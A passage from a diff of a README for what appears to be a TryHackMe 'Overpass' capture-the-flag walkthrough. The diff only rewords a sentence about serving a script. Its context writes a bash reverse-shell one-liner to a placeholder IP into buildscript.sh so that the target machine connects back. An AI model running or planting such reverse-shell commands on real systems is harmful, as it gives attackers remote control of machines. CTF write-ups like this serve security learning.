Nima-Fr/TryHackMe/Overpass/README.md

 └─$ echo "bash -i >& /dev/tcp/<YOUR IP>/4444 0>&1" > buildscript.sh
 ~~~

-Now we start a server where the directories start (www in my case), so when the target machine tries to connect to the virtual host, it can connect to us and run our script:
+Now we start a server where the directories start (www in my case), so when the target machine tries to connect to the virtual host, it connects to us and runs our script:

 ~~~
 ┌──(user㉿Y0B01)-[~/…/walkthroughs/thm/Overpass/www]